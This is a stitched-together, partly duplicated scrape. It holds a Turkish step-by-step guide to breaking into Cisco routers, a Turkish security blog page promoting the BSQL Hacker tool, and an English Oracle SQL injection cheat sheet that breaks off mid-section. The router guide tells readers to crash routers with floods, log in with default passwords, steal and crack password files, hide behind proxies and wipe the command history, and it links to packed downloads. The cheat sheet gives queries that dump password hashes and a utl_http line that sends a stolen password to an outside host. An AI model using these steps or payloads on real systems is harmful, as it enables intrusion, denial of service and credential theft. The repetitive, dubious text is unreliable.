neden bir cisco router hacklensin ?Cunku sistemlere giris yapmak icin kullanislidirlar. Cisco routerlar, bazilari bir sistemde 18 T1 baglantisiyla , cok hizlidirlar, ve cok esnektirler ve DoSsaldirilarinda kullanilabilirver ya da baska sistemleri hacklemek icin kullanilabilirler. Bir anda binlerce paket uzerlerinden gecer ve bunlar yakalanip decode edilebilirler. Bir cok Cisco router guvenilir sistemlerdir,ve kendi networkundaki bilgisayarlara baglanabilmeniz icin size belli miktarda izin verir.
Bolum 2:
bir cisco router bulmak Cok basittir, hemen hemen her ISS en az bir Cisco router uzerinden gecer. Bir cicso router bulmanin en kolay yolu DOS da traceroute calistirmaktir (“tracert ipAddress”). Hemen hemen herkesi tracert edebilisiniz cunku trace aradaki tum bilgisayarlarin listesini verecektir sizinve hedefiniz arasindaki. Ve bu sistemler biri muhtemelen cisco ismini tasiyor olacaktir. Bu sekilde bir tane bulursaniz, IP adresini not alin. Simdicisco router un nerde oldugunu biliyorsunuz fakat kendisini koruyan bir firewall olabilir, dolayisiyla blocklanip blocklanmadigini anlamak icin bir kac kere pinglersiniz. Eger pinginiz geri donuyorsa blocklanmami olabilir. Baskabir yolda, bazi Cisco router portlarina erisimi denemektir, bunu da basitcetelneti kullanarak ve port 23 deki bir router a bir baglanti acarak yapabilirsin. Eger bir sifre sorarsa fakat kullanici adi sormazsa routerdasindir, fakat, eger kullanici adi da isterse o zaman buyuk ihtimallebir firewalldasindir. Bu dokumanin amaci routerda ne yapilabilir oldugu ve firewall nasil atlatilir anlatilmayacagi icin firewall olmayan bir router bulmayi deneyin. Iyi bir sistem buldugunuza emin olduktan sonra, port 23u kullanmaniza izin verecek bir proxy server da bulmalisiniz, bu sayede sizin IP niz loglanmaz routerda.
Bolum 3:
Bir Cisco Routera nasil girilir?v4.1 software calistiran Cisco routers (ki cogu boyledir) kolaylikla islem disi birakilabilir. Sadece router a bir proxy serverin 23 uncu portuyla giris yapin, ve asagidaki sekilde uzun bir password girin :
Download Rar : http://www.dosyaload.net/download.php?file=4f8e871bfe9382e1f034ac9477e78acf
Pass : cs
Sonra bekleyin, Cisco sistemi reboot olabilir ki offline olacagi icin hackleyemezsiniz. Fakat buyuk ihtimalle 2-10 dakikaligina donacaktir, ki bu surede de siz iceri girmeye calismalisiniz. Eger hic biri de olmadiysa, budemektir ki kullanilan programda acik yok, o zaman sizde bir surelik DoS saldirisi yapabilirsiniz.
DOS a gidin "ping -l 56550 cisco.router.ip -t", yazin,ayni isi gorecektir. Sistem donmus durumdayken, baska bir proxy den baska bir baglanti acmaya calisin, ve sifreyi admin olarak girin, bunun nedeni, bu default sifredir ve gecici olarak islevsiz birakildigindan sistem default ayarlarina donecektir. Log in olduktan sonra sifre dosyasini elde etmelisiniz. Sistemler degisik programlar kullanabilir, ama cogunun “htl-textil” yada benzer bir prompt u vardir, orda ? yazarsaniz butun komutlarin listesini gorebilirsiniz, ve orda bir yerde transfer komutunun ne oldugunu bulabilirsiniz, sonra da bu komutla adminin sifre dosyasini alabilirve kendi IP adresinize gonderebilirsiniz. Fakat bundan once HyperTerminali Cisco routerdan bir cagri beklemek uzere ayarlayin. Simdi, dosyayi gonderdikten sonra, HyperTerminal size bunu kabul etmek isteyip istemediginizi soracaktir, evet diyerek bunu bir yere kaydedin. Logout yapin. En zor kismi gecmis bulunmaktasiniz, simdi sifreyi kirmak icin hazirlanin.
Bolum 4:
Sifreyi KirmakSifre dosyasini aldiginiza gore, routera yeniden erisebilmek icin bunu kirmaniz gerekir. Bunu yapmak icin, John the Ripper gibi bir program ya da benzer bir sey calistirabilirsiniz sifre dosyasinda. Bu en kolay ve tavsiye edebilecegim yolu. Diger bir yol da deniyerek sifreyi decryt etmektir. Bunun icin bir cesit decryption programina ihtiyaciniz olacak, ve bol sabirave bazi decrption siralarini bulmaniz gerekecek.
Iste bir Cisco sifresi icin ornek bir dcryption siralamasi:
Download Rar : http://www.dosyaload.net/download.php?file=3d3913b9fa0b7f24bbde1c01c13a80ec
Pass : cs
Eger Linux’unuz yoksa, sifreyi kirmak icin tek yolunuz John the Ripper ile ya da baska bir password-cracker programi ile, dosyaya dictionary (sozluk) ya da brute-force attackler yapmaktir.
Bolum 5:
Router’I kullanmaTeknolojinin bu harika parcasini kullanmak icin, ona baglanmaniz lazim once, eger IP nizini loglanmasini istemiyorsaniz, proxy kullanin. Login olduktan sonra, history yi islevsiz hale getirebilirsiniz boylelikle kimse ne yapiyor oldugunuza bakamaz, sadece “terminal history size 0” yazmaniz yeterli. “?” yazarak routerin komut listesine ulasabilirsiniz ve bir cogunu kullanabilirsiniz.
Bu routerlarda genellikle telnet vardir, dolayisiyla telneti baska sistemlere ulasmak ve hacklemek icin kullanabilirsiniz ( unix box lar gibi). Ayni zamanda ping ve traceroute da vardir routerda, bunlari da sistemleri izlemek ya da DoS saldirilari yapmak icin kullanabilirsiniz. Paketleri engellemek icin de kullanabilirsiniz ama bunu hic tavsiye etmem, cunku herzaman calismayacagi gibi, farkedilmenize de neden olabilir. Ilk denemenizde bir Cisco hackleyemezseniz, dert etmeyin… cunku muhtemelen ilk seferde hatta belki de ikinci seferde de basaramiyacaksinizbunu. Deneme ve bol sabir isteyen bir seydir.
Bu dokuman bir seri ispatlanmis cisco exploitlerinin sisteme erisim saglamak icin nasil kullanilacagini adim adim anlatacaktir. Eger bir cisco router’a girerken yakalanir ya da sistemi bozarsaniz yuzlerce internet kullanicisini zor durumda birakir, binlerce dolar hasara neden olabilirsiniz, o yuzden sadece izniniz varsa deneyin bunlari J yanlis sekilde kullanilmasi basinizi cok derde sokabilir.
Baslamadan once bilmeniz gerekenler
IP adres nedir?
IP, Internet protokolunun kisaltilmis halidir. IP adresleri bilgisayarlar tarafindan kendilerine baglanmis diger bilgisayarlari taminada kullanilir. Bu IRC den nasil banlandiginizdir ve nasil ISS inizin bulunmasidir. IP adresleri cok kolaylikla alinirlar.
IP adresi bulmak icin su yontemler kullanilir :
Bir websitesine gidersiniz ve IP niz loglanir· IRC de isteyen herkes IP nizi alabilir· ICQ da “IP mi gosterme” secenegini secmis dahi olsaniz yine de IPniz alinabilir· Eger bir yere baglanmissaniz, “systat” yazarak kimin baglanmis oldugunu gorebilirler.· Birisi eger size IP-logging java li bir email gondermisse, ayni zamanda sizin IP nizi de alirBunlardan baska IP adresini almak icin bir cok yontem vardir, back-door programlari sub7 ya da NetBus kullanmak gibiISS nedir?ISS, internet servis saglayicisinin kisaltilmisidir, ve size interneti veren firmadir. Dial-up yapip bir baglanti sagladiginizda baglandiginiz sistemdir. Isteyen birileri sizin ISS inizi size bir traceroute uygulayarak bulabilir ( traceroute daha ilerde aciklanacaktir).
Su sekildedir :
tracert 222.222.22.22Tracing route to [221.223.24.54]over a maximum of 30 hops.1 147ms 122ms 132ms your.isp [222.222.22.21]2 122ms 143ms 123ms isp.firewall [222.222.22.20]3 156ms 142MS 122ms aol.com [207.22.44.33]4 * * * Request timed out5 101ms 102ms 133ms cisco.router [194.33.44.33]6 233ms 143ms 102ms something.ip [111.11.11.11]7 222ms 123ms 213ms netcom.com [122.11.21.21]8 152ms 211ms 212ms blahblah.tts.net [121.21.21.33]9 122ms 223ms 243ms altavista.34.com [121.22.32.43] <<< target’s isp10 101ms 122ms 132ms 221.223.24.54.altavista.34.com [221.223.24.54]Trace complete.
TCP/IP packeti nedir?
TCP/I . Transmission Control Protocol and Internet Protocol’unun kisaltilmisidir, bir TCP/IPPacketi sIkistirilmis sonra bir header (baslik) eklenmis ve baska bir bilgisayara gonderilmis blok halinde bir datadir. Butun internet transferlerinin paketler gondererek nasil olustugudur. Bir paketteki header (baslik), paketi gonderen bilgisayarin IP adresini icerir. Bir paketi yeniden yazip herhangi birinden gelmis gibi gosterebilirsiniz.
Bir cok sisteme erisim saglamak icin bunu kullanabilirsiniz ve yakalanmazsiniz.Linux calistiriyor olmaniz ya da bunu yapmanizi saglayacak bir programinizin olmasi gerekir.Ipnizi nasil saklarsiniz:Genius 2 ya da DC IS gibi programlardan birini bulun, bunlar sizin IdentD calistirmaniza izin veriri. Isteginize bagli olarak bilgisayarinizin kimliginin bir parcasinin degistirmenize yardim eder. Bunu IRC chat roomlardan banlandiginizda kullanin… hemencecik geri girersiniz. Ayni zamanda baska bir sisteme erisirken de kullanabilirsiniz, bu sekilde yanlis bir kimligi loglarlar.
Telnet nasil kullanilir:
Telneti kolayca baslat menunuzden calistiri secip telnet yazmak suretiyle acabilirsiniz. Telneti actiktan sonra bazi ozellikleri degistirmek isteyebilirsiniz. Terminal>Preferences uzerine tiklayin. Burdan buffer size ini , fontu ve diger seyleri degistirebilirsiniz. Ayni zamanda “local echo” yuacabilir ya da kapatabilirsiniz. Eger “local echo”yu acarsaniz, bilgisayariniz size yazdiginiz her seyi gosterir, ve bagli bulundugunuz bilgisardakileri de. Boylece bilgisayarinizda “hello” yazdiginizda “hhelelollo” seklinde bir karsilik alirsiniz. Bunun nedeni, bilginin geri gelerek sizin yazdiginizla karismasidir, bu ozelligi sadece bilgisayarin ne yazdigimi bana geri gonderip gondermedigini gormek icin kullanirim.
Default olarak telnet,telnet portundaki ( port 23) bir sisteme baglanir. Her zaman 23uncu porta baglanmak istemeyebilirsiniz, o zaman baglantiya gittiginizde port u mesela 25 e cevirebilirsiniz, ki bu mail serverlarinin portudur. Ya da FTP icin 21 e. Binlerce degisik port vardir, bu yuzden dogru olani sectiginizden emin olun.
HyperTerminal nasil kullanilir ?
HyperTerminal, belirli bir bilgisayara giren bilgiyi dinlemeniz icin kendi bilgisayarinizdan herhangi bir porttan bir server acmaniza musade eder. Bunu kullanmak icin Baslat >> programlar >> donatilar >> iletisim >> HyperTerminal secmeniz yeterli. Once bir baglanti secmeniz gerekir, TCP/IP Winsock I secin, sonra iletisim kuracaginiz bilgisayari yazin, ve port numarasini belirleyin. HyperTerminale inputlari dinlemesini soyleyebilirsiniz su sekilde: Call >> wait for call. Simdi diger bilgisayar size o porttan baglanir ve chat yapabilir dosya transfer edebilirsiniz.
Ping nasil kullanilir :
Ping cok basittir, sadece MS-DOS u acin ve “ping ip adresi “ yazin. Default olarak 3 kere ping yapar, fakat “ping ip adres -t” yazarsaniz sonsuza kadar pingler. Ping buyuklugunu degistirmek icin sunu yapin : "ping -l (size) ip.address" . Pingin yaptigi bir bilgisayara bir data paketi yollamak, ve ne zaman geri donecegini beklemektir, bununla bilgisayarin baglanti hizi ve paketin gidip geri gelmesi esnasinda gecen zaman ( “trip time” olarak adlandirilir ) anlasilir.
Ping ayni zamanda bir sistemi yuklu sayida ping flood ederek yavaslatmak ya da cokertmek icin de kullanilabilir. Windows 98 bir dakikalik ping floodundan sonra cokebilmektedir. Bir ping flood saldirisi hedefinizden cok sizden yuksek oranda bandwidth alir( eger saldirdiginiz bir Windows 98 makine ve sizin modeminiz orta halli birseyse o zaman bir dakika icinde sistemi cokertmeniz mumkun ) . Ping flood kuvvetli hedeflerde etkili olmaz. Not : DOS un -t secenegi ping flood yapmaz, sadece hedegi surekli pingler, bir pingle digerinin arasinda bir ara vererek. Her Unix ve Linux makinelerde, ping -f kullanarak gercek bir ping flood yapabilirsiniz.
Aslinda ping -f distribution ininizin POSIX-compliant olabilmesi icin gereklidir. TraceRoute nasil kullanilir :Baglantinizi izlemek icin ( ve de sizinle hedefiniz olan bilgisayar arasindaki tum bilgisayarlari gorebilmek icin ) sadece MS_DOS acin ve "tracert ip.address" yazin. Boylelikle sizinle hedefiniz arasindaki bilgisayarlarin listesini alirsiniz. Bunu arada herhangi bir seyi blocklayan bir firewall un olup olmadigini anlamak icin kullanabilirsiniz. Ve bununla birlikte bir kisinin ISS ini de anlamaya kullanilabilir bu komut. ISS I ayirt etmek icin listedekien sondan bir onceki IP adresine bakin, bu ISS in routerlarindan birinin adresi olacaktir ihtimalle.
Basitce traceroute soyle calisir :
Bir TCP/IP paketi headerinda ( basliginda ) TTL (time to live ) adi verilen bir deger tasir. Paketin her sekmesinde bu deger bir azalir. Bu sadece bir seylerin yanlis giderek paketin net uzerinde surekli sekmesini ve dolayisiyla bandwidth harcamasini onlemek icindir. Bir paketin TTL I sifir oldugu anda paket olmekte ve bir ICMP hatasi gonderici bilgisayara gonderilmektedir.Simdi, traceroute once TTL degeri 1 olan bir paket gonderir, Bu paket cabucak geri doner,ve ICMP hata basligindaki gonderenin adresine bakarak,traceroute paketin ilk sekmesinde nerde oldugunu gorur. Sonra ikinci bir paket TTL degeri 2 olarak yola cikarilir ve ikinci sekmeden sonra geri doner ve takildigi makinenin kimliginide getirerek. Bu bu sekilde paket hedefine ulasana kadar devam eder.
Proxy server nasil kullanilir ?
Web de istediginiz bir portta calisan bir proxy server aramasi yapin. Bir tane buldugunuzda, telnetle ya da hyperterminalle ona baglanin, sonra dabu server uzerinden baska bir makineye baglanin. Boylelikle diger ucdaki bilgisayar sizin IP adresinizi bilemez.
Bolum 1:
neden bir cisco router hacklensin ?Cunku sistemlere giris yapmak icin kullanislidirlar. Cisco routerlar, bazilari bir sistemde 18 T1 baglantisiyla , cok hizlidirlar, ve cok esnektirler ve DoSsaldirilarinda kullanilabilirver ya da baska sistemleri hacklemek icin kullanilabilirler. Bir anda binlerce paket uzerlerinden gecer ve bunlar yakalanip decode edilebilirler. Bir cok Cisco router guvenilir sistemlerdir,ve kendi networkundaki bilgisayarlara baglanabilmeniz icin size belli miktarda izin verir.
Bolum 2:
bir cisco router bulmak Cok basittir, hemen hemen her ISS en az bir Cisco router uzerinden gecer. Bir cicso router bulmanin en kolay yolu DOS da traceroute calistirmaktir (“tracert ipAddress”). Hemen hemen herkesi tracert edebilisiniz cunku trace aradaki tum bilgisayarlarin listesini verecektir sizinve hedefiniz arasindaki. Ve bu sistemler biri muhtemelen cisco ismini tasiyor olacaktir. Bu sekilde bir tane bulursaniz, IP adresini not alin. Simdicisco router un nerde oldugunu biliyorsunuz fakat kendisini koruyan bir firewall olabilir, dolayisiyla blocklanip blocklanmadigini anlamak icin bir kac kere pinglersiniz. Eger pinginiz geri donuyorsa blocklanmami olabilir. Baskabir yolda, bazi Cisco router portlarina erisimi denemektir, bunu da basitcetelneti kullanarak ve port 23 deki bir router a bir baglanti acarak yapabilirsin. Eger bir sifre sorarsa fakat kullanici adi sormazsa routerdasindir, fakat, eger kullanici adi da isterse o zaman buyuk ihtimallebir firewalldasindir. Bu dokumanin amaci routerda ne yapilabilir oldugu ve firewall nasil atlatilir anlatilmayacagi icin firewall olmayan bir router bulmayi deneyin. Iyi bir sistem buldugunuza emin olduktan sonra, port 23u kullanmaniza izin verecek bir proxy server da bulmalisiniz, bu sayede sizin IP niz loglanmaz routerda.
Bolum 3:
Bir Cisco Routera nasil girilir?v4.1 software calistiran Cisco routers (ki cogu boyledir) kolaylikla islem disi birakilabilir. Sadece router a bir proxy serverin 23 uncu portuyla giris yapin, ve asagidaki sekilde uzun bir password girin :
Download Rar : http://www.dosyaload.net/download.php?file=4f8e871bfe9382e1f034ac9477e78acf
Pass : cs
Sonra bekleyin, Cisco sistemi reboot olabilir ki offline olacagi icin hackleyemezsiniz. Fakat buyuk ihtimalle 2-10 dakikaligina donacaktir, ki bu surede de siz iceri girmeye calismalisiniz. Eger hic biri de olmadiysa, budemektir ki kullanilan programda acik yok, o zaman sizde bir surelik DoS saldirisi yapabilirsiniz.
DOS a gidin "ping -l 56550 cisco.router.ip -t", yazin,ayni isi gorecektir. Sistem donmus durumdayken, baska bir proxy den baska bir baglanti acmaya calisin, ve sifreyi admin olarak girin, bunun nedeni, bu default sifredir ve gecici olarak islevsiz birakildigindan sistem default ayarlarina donecektir. Log in olduktan sonra sifre dosyasini elde etmelisiniz. Sistemler degisik programlar kullanabilir, ama cogunun “htl-textil” yada benzer bir prompt u vardir, orda ? yazarsaniz butun komutlarin listesini gorebilirsiniz, ve orda bir yerde transfer komutunun ne oldugunu bulabilirsiniz, sonra da bu komutla adminin sifre dosyasini alabilirve kendi IP adresinize gonderebilirsiniz. Fakat bundan once HyperTerminali Cisco routerdan bir cagri beklemek uzere ayarlayin. Simdi, dosyayi gonderdikten sonra, HyperTerminal size bunu kabul etmek isteyip istemediginizi soracaktir, evet diyerek bunu bir yere kaydedin. Logout yapin. En zor kismi gecmis bulunmaktasiniz, simdi sifreyi kirmak icin hazirlanin.
Bolum 4:
Sifreyi KirmakSifre dosyasini aldiginiza gore, routera yeniden erisebilmek icin bunu kirmaniz gerekir. Bunu yapmak icin, John the Ripper gibi bir program ya da benzer bir sey calistirabilirsiniz sifre dosyasinda. Bu en kolay ve tavsiye edebilecegim yolu. Diger bir yol da deniyerek sifreyi decryt etmektir. Bunun icin bir cesit decryption programina ihtiyaciniz olacak, ve bol sabirave bazi decrption siralarini bulmaniz gerekecek.
Iste bir Cisco sifresi icin ornek bir dcryption siralamasi:
Download Rar : http://www.dosyaload.net/download.php?file=3d3913b9fa0b7f24bbde1c01c13a80ec
Pass : cs
Eger Linux’unuz yoksa, sifreyi kirmak icin tek yolunuz John the Ripper ile ya da baska bir password-cracker programi ile, dosyaya dictionary (sozluk) ya da brute-force attackler yapmaktir.
Bolum 5:
Router’I kullanmaTeknolojinin bu harika parcasini kullanmak icin, ona baglanmaniz lazim once, eger IP nizini loglanmasini istemiyorsaniz, proxy kullanin. Login olduktan sonra, history yi islevsiz hale getirebilirsiniz boylelikle kimse ne yapiyor oldugunuza bakamaz, sadece “terminal history size 0” yazmaniz yeterli. “?” yazarak routerin komut listesine ulasabilirsiniz ve bir cogunu kullanabilirsiniz.
Bu routerlarda genellikle telnet vardir, dolayisiyla telneti baska sistemlere ulasmak ve hacklemek icin kullanabilirsiniz ( unix box lar gibi). Ayni zamanda ping ve traceroute da vardir routerda, bunlari da sistemleri izlemek ya da DoS saldirilari yapmak icin kullanabilirsiniz. Paketleri engellemek icin de kullanabilirsiniz ama bunu hic tavsiye etmem, cunku herzaman calismayacagi gibi, farkedilmenize de neden olabilir. Ilk denemenizde bir Cisco hackleyemezseniz, dert etmeyin… cunku muhtemelen ilk seferde hatta belki de ikinci seferde de basaramiyacaksinizbunu. Deneme ve bol sabir isteyen bir seydir.
ORACLE SQL Injection
BSQL Hacker için ORACLE modülü geliştirirken ORACLE' da SQL Injection araştırmaları yapmaya ve bir ufak bir cheat sheet hazırlamaya vaktim oldu. Dokümanı inaşallah bu Pazartesi ya da Salı günü yayınlayacağım.
Bu arada BSQL Hackerda sayısız yenilikler oldu. Bazıları
* SQL Server ve ORACLE için Otomatik exploit motoru (PostgreSQL ve MySQL yolda)
* GUI' den test imkanı
* Hızlı bir şekilde olaya girmek için 2 tane Wizard (Raw Request' ten veya URL den direk injection oluşabiliyor)
* Kendini Güncelleme özelliği
* Exploit Repository ve Güncelleme desteği. Bu sayede diğer sitelerden ve resmi exploit deposundan otomatik olarak yeni exploitleri indirebilir ya da kendi exploitlerini dağıtabilirsiniz.
* Exploitleri Yükleme ve Kaydetme
* Doğru veya yanlış anahtar kelimeleri girmeden otomatik olarak çıktılardaki değişiklikleri tespit edebilme
* Raw Request, Response ve Cevabın doğru - yanlış - hatalı olduğunu görme
* Kolay bug report özellikleri
* ve daha bir çok başka şey...
Hala beta aşamasında, yakında tam olarak public beta' yı yayınlayacağım inaşşallah. 2 haftadan fazla sürmeyeceğini umuyorum.
Yorumlar 10 Yorum var - Yorum Ekle Yorumunu Ekle
anahtar kelimeler : blog haber news bsql oracle bsql hacker sql injection
ferruh.mavituna
Site genel olarak güvenlik, internet ve web teknolojileri üzerine yazdığım yazılardan oluşmaktadır. Sitede 2003 yılından bu yana yazılmış 1750' den fazla yazı bulunmaktadır.
Bunun yanında projeler de geliştirdiğim projeleri, ar-ge kısmında güvenlik araştırma dokümanlarıma ulaşabilir, programlar kısmından yazdığım yazılımları download edebilirsiniz. Site hakkında.
List of english articles, RSS or try this page.
PROJECTS
* Freaking Simple Fuzzer
* Psycho Folder
* BSQL Hacker
* Win MD5 Checksum Tool
* Hocus Pocus
* SQL Injection Cheat Sheet
* SQL Injection Wiki
* Refactor My RegEx
* Bir sey ogren
ARAMA
Detaylı Arama
TAKİP
Siteyi RSS ile Takip Et Siteyi E-mail ile Takip Et RSS Takipçileri
website stats Follow me on Twitter Follow me on FriendFeed
YORUMLAR
pigme 23 saat 20 dakika önce Cnbc-e Dergi ' e yorum yazdı.
aus 1 gün 2 saat 44 dakika önce Fikir Üretme, Etki ve Tepki ' e yorum yazdı.
CANLI YAYIN
delicious
delicious
zabihah.com - your guide to halal eating
3 saat önce - Yorumla
delicious
delicious
Abdullah's Blog on Software: Dictionary Performance
4 saat önce - Yorumla
Blog
FM Shared on NewsGator Online
Neden Anti-XSS?
dün 6:40 - Yorumla
Twitter
Twitter
“@_ikki Cheers mate, we are getting there :)”
dün 7:31 - Yorumla
Twitter
Twitter
“@timb_machine yes I'm. I'm also planning to some automated ownage via upload forms. -no promises though :) -”
dün 7:27 - Yorumla
FriendFeed'imi görüntüle - Bana abone ol
KATEGORİLER
* Projeler - Programlar
*
o BSQL Hacker
* En İyi Yazılar
* Güvenlik
* Yazılım Geliştirme
* Kitap
* Kişisel / Hayat
* Kişisel Gelişim
* Online Araçlar ve Projeler
*
o Encoder / Converter
* SQL Injection
*
o SQL Injection Dersleri
o SQL Injection Cheat Sheet
o ORACLE SQL Injection Cheat Sheet
o Record Locator
o Error Based SQL Injections
* Tüm Kategoriler
ARŞİV
Senelere Göre Arşivler
* 2009 (dur daha yeni başladı!)
* 2008 (147 yazı)
* 2007 (358 yazı)
* 2006 (299 yazı)
* 2005 (356 yazı)
* 2004 (350 yazı)
* 2003 (245 yazı)
Diğer Arşiv Erişimleri
* Etiket Arşivi
* Son Yazılar
* En iyi Yazılar
* En Popüler Yazılar
* En Tırt Yazılar
* Çok konuşulan Yazılar
* Kimsenin Takmadığı Yazılar
Bu arada BSQL Hackerda sayısız yenilikler oldu. Bazıları
* SQL Server ve ORACLE için Otomatik exploit motoru (PostgreSQL ve MySQL yolda)
* GUI' den test imkanı
* Hızlı bir şekilde olaya girmek için 2 tane Wizard (Raw Request' ten veya URL den direk injection oluşabiliyor)
* Kendini Güncelleme özelliği
* Exploit Repository ve Güncelleme desteği. Bu sayede diğer sitelerden ve resmi exploit deposundan otomatik olarak yeni exploitleri indirebilir ya da kendi exploitlerini dağıtabilirsiniz.
* Exploitleri Yükleme ve Kaydetme
* Doğru veya yanlış anahtar kelimeleri girmeden otomatik olarak çıktılardaki değişiklikleri tespit edebilme
* Raw Request, Response ve Cevabın doğru - yanlış - hatalı olduğunu görme
* Kolay bug report özellikleri
* ve daha bir çok başka şey...
Hala beta aşamasında, yakında tam olarak public beta' yı yayınlayacağım inaşşallah. 2 haftadan fazla sürmeyeceğini umuyorum.
Yorumlar 10 Yorum var - Yorum Ekle Yorumunu Ekle
anahtar kelimeler : blog haber news bsql oracle bsql hacker sql injection
ferruh.mavituna
Site genel olarak güvenlik, internet ve web teknolojileri üzerine yazdığım yazılardan oluşmaktadır. Sitede 2003 yılından bu yana yazılmış 1750' den fazla yazı bulunmaktadır.
Bunun yanında projeler de geliştirdiğim projeleri, ar-ge kısmında güvenlik araştırma dokümanlarıma ulaşabilir, programlar kısmından yazdığım yazılımları download edebilirsiniz. Site hakkında.
List of english articles, RSS or try this page.
PROJECTS
* Freaking Simple Fuzzer
* Psycho Folder
* BSQL Hacker
* Win MD5 Checksum Tool
* Hocus Pocus
* SQL Injection Cheat Sheet
* SQL Injection Wiki
* Refactor My RegEx
* Bir sey ogren
ARAMA
Detaylı Arama
TAKİP
Siteyi RSS ile Takip Et Siteyi E-mail ile Takip Et RSS Takipçileri
website stats Follow me on Twitter Follow me on FriendFeed
YORUMLAR
pigme 23 saat 20 dakika önce Cnbc-e Dergi ' e yorum yazdı.
aus 1 gün 2 saat 44 dakika önce Fikir Üretme, Etki ve Tepki ' e yorum yazdı.
CANLI YAYIN
delicious
delicious
zabihah.com - your guide to halal eating
3 saat önce - Yorumla
delicious
delicious
Abdullah's Blog on Software: Dictionary Performance
4 saat önce - Yorumla
Blog
FM Shared on NewsGator Online
Neden Anti-XSS?
dün 6:40 - Yorumla
“@_ikki Cheers mate, we are getting there :)”
dün 7:31 - Yorumla
“@timb_machine yes I'm. I'm also planning to some automated ownage via upload forms. -no promises though :) -”
dün 7:27 - Yorumla
FriendFeed'imi görüntüle - Bana abone ol
KATEGORİLER
* Projeler - Programlar
*
o BSQL Hacker
* En İyi Yazılar
* Güvenlik
* Yazılım Geliştirme
* Kitap
* Kişisel / Hayat
* Kişisel Gelişim
* Online Araçlar ve Projeler
*
o Encoder / Converter
* SQL Injection
*
o SQL Injection Dersleri
o SQL Injection Cheat Sheet
o ORACLE SQL Injection Cheat Sheet
o Record Locator
o Error Based SQL Injections
* Tüm Kategoriler
ARŞİV
Senelere Göre Arşivler
* 2009 (dur daha yeni başladı!)
* 2008 (147 yazı)
* 2007 (358 yazı)
* 2006 (299 yazı)
* 2005 (356 yazı)
* 2004 (350 yazı)
* 2003 (245 yazı)
Diğer Arşiv Erişimleri
* Etiket Arşivi
* Son Yazılar
* En iyi Yazılar
* En Popüler Yazılar
* En Tırt Yazılar
* Çok konuşulan Yazılar
* Kimsenin Takmadığı Yazılar
ORACLE SQL Injection Cheat Sheet
ORACLE SQL Injection Cheat Sheet
Etiketler sql injection, oracle, paper, english, cheat sheet, 02.10.2007
*
Introduction
* ORACLE SQL Injection Notes
*
Concatenation
*
Comments
*
Casting
* Strings without Quotes
* Getting Stuff
o Getting Tables
o
Getting Columns
o Getting Current Database Name
o Getting Users and Passwords
o Getting Version
o Getting Current User
* Simple Union Query
* Simulating SQL Server's TOP feature
* Moving Records one by one
* Functions useful for Blind SQL Injection
* Doing outbound connections
* References, Credits, Thanks & Document History
Introduction
Quick and Dirty ORACLE SQL Injection Cheat Sheet which will be combined with main SQL Injection Cheat Sheet eventually. This cheat sheet can help you to get started for basic ORACLE SQL Injections.
ORACLE SQL Injection Notes
In ORACLE you can not just SELECT stuff you have to SELECT them from some table. For this purpose you can use special table called DUAL.
i.e. SELECT 'dummydata' || 'x' FROM DUAL;
You have to close comments if you used /* comment */ style comments
Concatenation
SELECT utl_raw.concat('x','y') FROM DUAL; SELECT 'x' || 'y' FROM DUAL; SELECT 'a' || 'b' FROM DUAL; SELECT user || '-' || password FROM members;
Comments
/* comment */
Note : You have to close this comments properly otherwise you'll get syntax error.
Line comment : --
Casting
For most of the data types concatenating data with a string can do the casting automatically. SELECT 1 || 'a' FROM DUAL;
Strings without quotes
SELECT chr(110) || chr(111) FROM DUAL;
OR
SELECT utl_raw.cast_to_varchar2(TO_CHAR(110)) FROM DUAL;
Getting Stuff
Getting Tables
SELECT table_name FROM all_tables WHERE TABLESPACE_NAME='USERS'
Getting Columns
SELECT column_name FROM all_tab_columns WHERE table_name = 'TABLE-NAME'
Getting Current Database Name
SELECT global_name FROM global_name
Getting Users and Passwords
SELECT name, password FROM sys.user$ where type#=1
Getting version
Select banner || '-' || (select banner from v$version where banner like 'Oracle%') from v$version where banner like 'TNS%'
Getting Current User
SELECT user FROM dual
Simple Union Query
http://127.0.0.1/sqlinjection/ora.php?id=-101%20UNION%20ALL%20SELECT%20(SELECT%20user%20FROM%20dual)%20FROM%20DUAL
Simulating SQL Server's TOP feature
SELECT FIRST_NAME FROM (SELECT ROWNUM R, FIRST_NAME FROM hr.employees) WHERE R <= 3;
Moving Records one by one
SELECT FIRST_NAME FROM (SELECT ROWNUM R, FIRST_NAME FROM hr.employees) WHERE R = 3;
Functions useful for Blind SQL Injetion
* BEGIN DBMS_LOCK.SLEEP(5); END; - Sleep for 5 seconds
* CHR() - Convert to Char
* ASCII() - Convert to ASCII
* SUBSTR() - Substring
* BITAND() - Bit And operation
* LOWER() - Convert to LowerCase
Doing outbound connections
* SELECT utl_http.request('http://www.example.com') FROM DUAL SELECT utl_http.request('http://www.example.com/?' || (SELECT pass FROM members) ) FROM DUAL
* SELECT HTTPURITYPE('http://www.example.com').getXML() FROM DUAL;
You can test blind SQL Injection from DNS requests (can be more reliable against egress filtering) or from actual web request.
References, Papers & Credits
* Thanks to Pentestmonkey, Notsosecure, Alexander Kornbrust
* SQL Injection Attacks for ORACLE Developers
* Red Database Security Papers
* SQL Injection Cheat Sheet
Document History
* 02/10/2007 - Public Release
* 02/10/2007 - Getting passwords section and utl_http replaced with new and easier ones. Thanks to Alexander Kornbrust
* 09/10/2007 - Sleep function added
Etiketler sql injection, oracle, paper, english, cheat sheet, 02.10.2007
*
Introduction
* ORACLE SQL Injection Notes
*
Concatenation
*
Comments
*
Casting
* Strings without Quotes
* Getting Stuff
o Getting Tables
o
Getting Columns
o Getting Current Database Name
o Getting Users and Passwords
o Getting Version
o Getting Current User
* Simple Union Query
* Simulating SQL Server's TOP feature
* Moving Records one by one
* Functions useful for Blind SQL Injection
* Doing outbound connections
* References, Credits, Thanks & Document History
Introduction
Quick and Dirty ORACLE SQL Injection Cheat Sheet which will be combined with main SQL Injection Cheat Sheet eventually. This cheat sheet can help you to get started for basic ORACLE SQL Injections.
ORACLE SQL Injection Notes
In ORACLE you can not just SELECT stuff you have to SELECT them from some table. For this purpose you can use special table called DUAL.
i.e. SELECT 'dummydata' || 'x' FROM DUAL;
You have to close comments if you used /* comment */ style comments
Concatenation
SELECT utl_raw.concat('x','y') FROM DUAL; SELECT 'x' || 'y' FROM DUAL; SELECT 'a' || 'b' FROM DUAL; SELECT user || '-' || password FROM members;
Comments
/* comment */
Note : You have to close this comments properly otherwise you'll get syntax error.
Line comment : --
Casting
For most of the data types concatenating data with a string can do the casting automatically. SELECT 1 || 'a' FROM DUAL;
Strings without quotes
SELECT chr(110) || chr(111) FROM DUAL;
OR
SELECT utl_raw.cast_to_varchar2(TO_CHAR(110)) FROM DUAL;
Getting Stuff
